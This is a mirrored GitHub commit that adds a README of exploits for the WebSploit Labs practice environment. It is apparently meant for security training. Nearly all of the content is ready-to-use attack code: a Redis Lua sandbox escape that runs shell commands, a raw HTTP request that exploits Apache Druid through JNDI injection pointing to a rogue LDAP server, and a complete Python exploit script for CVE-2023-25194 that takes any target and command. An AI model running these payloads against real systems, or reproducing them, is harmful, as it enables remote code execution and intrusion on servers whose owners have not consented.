mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-24 20:03:02 +00:00
Update README.md
This commit is contained in:
parent
40c5f6ea77
commit
fbf48884e2
1 changed files with 199 additions and 1 deletions
|
@ -1,7 +1,205 @@
|
|||
# Additional Exploits Used in WebSploit Labs
|
||||
|
||||
## DEC31_01
|
||||
## DC31_01
|
||||
|
||||
```
|
||||
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
|
||||
```
|
||||
|
||||
## DC31_02
|
||||
|
||||
```
|
||||
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
|
||||
Host: 10.7.7.22:8888
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
|
||||
Connection: close
|
||||
Cache-Control: max-age=0
|
||||
Content-Type: application/json
|
||||
Content-Length: 1792
|
||||
|
||||
{
|
||||
"type":"kafka",
|
||||
"spec":{
|
||||
"type":"kafka",
|
||||
"ioConfig":{
|
||||
"type":"kafka",
|
||||
"consumerProperties":{
|
||||
"bootstrap.servers":"127.0.0.1:6666",
|
||||
"sasl.mechanism":"SCRAM-SHA-256",
|
||||
"security.protocol":"SASL_SSL",
|
||||
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://roguo-jndi-server:1389/Basic/Command/base64/aWQgPiAvdG1wL3N1Y2Nlc3M=\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
|
||||
},
|
||||
"topic":"test",
|
||||
"useEarliestOffset":true,
|
||||
"inputFormat":{
|
||||
"type":"regex",
|
||||
"pattern":"([\\s\\S]*)",
|
||||
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
|
||||
"columns":[
|
||||
"raw"
|
||||
]
|
||||
}
|
||||
},
|
||||
"dataSchema":{
|
||||
"dataSource":"sample",
|
||||
"timestampSpec":{
|
||||
"column":"!!!_no_such_column_!!!",
|
||||
"missingValue":"1970-01-01T00:00:00Z"
|
||||
},
|
||||
"dimensionsSpec":{
|
||||
|
||||
},
|
||||
"granularitySpec":{
|
||||
"rollup":false
|
||||
}
|
||||
},
|
||||
"tuningConfig":{
|
||||
"type":"kafka"
|
||||
}
|
||||
},
|
||||
"samplerConfig":{
|
||||
"numRows":500,
|
||||
"timeoutMs":15000
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
This is a python script that can also be used:
|
||||
|
||||
```
|
||||
'''
|
||||
This script exploits the Druid RCE vulnerability (CVE-2023-25194) to execute commands on the target machine.
|
||||
'''
|
||||
|
||||
import argparse
|
||||
import base64
|
||||
import requests
|
||||
import json
|
||||
|
||||
def send_post_request(url, headers, data):
|
||||
'''
|
||||
send post request
|
||||
:param url: url
|
||||
:param headers: headers
|
||||
:param data: data
|
||||
:return: None
|
||||
'''
|
||||
response = requests.post(url, headers=headers, data=json.dumps(data))
|
||||
|
||||
status_code = response.status_code
|
||||
content = response.content.decode('utf-8')
|
||||
|
||||
if status_code == 500 or 'createChannelBuilde' in content:
|
||||
print('[+] Exploit Success ~')
|
||||
else:
|
||||
print('[-] Exploit maybe fail.')
|
||||
|
||||
|
||||
def get_data(jndi_ip, cmd):
|
||||
'''
|
||||
Function to get data for POST request body
|
||||
:param jndi_ip: jndi_ip
|
||||
:param cmd: command to execute
|
||||
:return: data
|
||||
'''
|
||||
data = {
|
||||
"type": "kafka",
|
||||
"spec": {
|
||||
"type": "kafka",
|
||||
"ioConfig": {
|
||||
"type": "kafka",
|
||||
"consumerProperties": {
|
||||
"bootstrap.servers": "127.0.0.1:6666",
|
||||
"sasl.mechanism": "SCRAM-SHA-256",
|
||||
"security.protocol": "SASL_SSL",
|
||||
"sasl.jaas.config": f"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://{jndi_ip}:1389/Basic/Command/base64/{cmd}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
|
||||
},
|
||||
"topic": "test",
|
||||
"useEarliestOffset": True,
|
||||
"inputFormat": {
|
||||
"type": "regex",
|
||||
"pattern": "([\\s\\S]*)",
|
||||
"listDelimiter": "56616469-6de2-9da4-efb8-8f416e6e6965",
|
||||
"columns": [
|
||||
"raw"
|
||||
]
|
||||
}
|
||||
},
|
||||
"dataSchema": {
|
||||
"dataSource": "sample",
|
||||
"timestampSpec": {
|
||||
"column": "!!!_no_such_column_!!!",
|
||||
"missingValue": "1970-01-01T00:00:00Z"
|
||||
},
|
||||
"dimensionsSpec": {
|
||||
|
||||
},
|
||||
"granularitySpec": {
|
||||
"rollup": False
|
||||
}
|
||||
},
|
||||
"tuningConfig": {
|
||||
"type": "kafka"
|
||||
}
|
||||
},
|
||||
"samplerConfig": {
|
||||
"numRows": 500,
|
||||
"timeoutMs": 15000
|
||||
}
|
||||
}
|
||||
# print(data)
|
||||
return data
|
||||
|
||||
def base64_encode(original_str):
|
||||
'''
|
||||
Function to encode string with base64
|
||||
:param original_str: original string
|
||||
:return: encoded string
|
||||
'''
|
||||
|
||||
original_bytes = original_str.encode('utf-8')
|
||||
encoded_bytes = base64.b64encode(original_bytes)
|
||||
encoded_str = encoded_bytes.decode('utf-8')
|
||||
return encoded_str
|
||||
|
||||
if __name__ == '__main__':
|
||||
'''
|
||||
The following are the arguments required for the script to run successfully
|
||||
-t, --target: target IP or hostname
|
||||
-j, --jndi-ip: jndi_ip
|
||||
-c, --cmd: command to execute
|
||||
'''
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument('-t', '--target', type=str, required=True, help='target IP or hostname')
|
||||
parser.add_argument('-j', '--jndi-ip', type=str, required=True, help='jndi_ip')
|
||||
parser.add_argument('-c', '--cmd', type=str, required=True, help='command to execute')
|
||||
args = parser.parse_args()
|
||||
|
||||
# Target URL
|
||||
url = f"http://{args.target}:8888/druid/indexer/v1/sampler"
|
||||
print("[+] URL:" + url)
|
||||
print("[+] Target IP:" + args.target)
|
||||
print("[+] JNDI IP:" + args.jndi_ip)
|
||||
print("[+] Command:" + args.cmd)
|
||||
|
||||
# Headers for POST request
|
||||
headers = {
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept": "*/*",
|
||||
"Accept-Language": "en-US;q=0.9,en;q=0.8",
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36",
|
||||
"Connection": "close",
|
||||
"Cache-Control": "max-age=0",
|
||||
"Content-Type": "application/json"
|
||||
}
|
||||
|
||||
# Get data for POST request body
|
||||
data = get_data(args.jndi_ip, base64_encode(args.cmd))
|
||||
|
||||
# Send POST request
|
||||
send_post_request(url, headers, data)
|
||||
```
|
||||
|
||||
|
|
Loading…
Reference in a new issue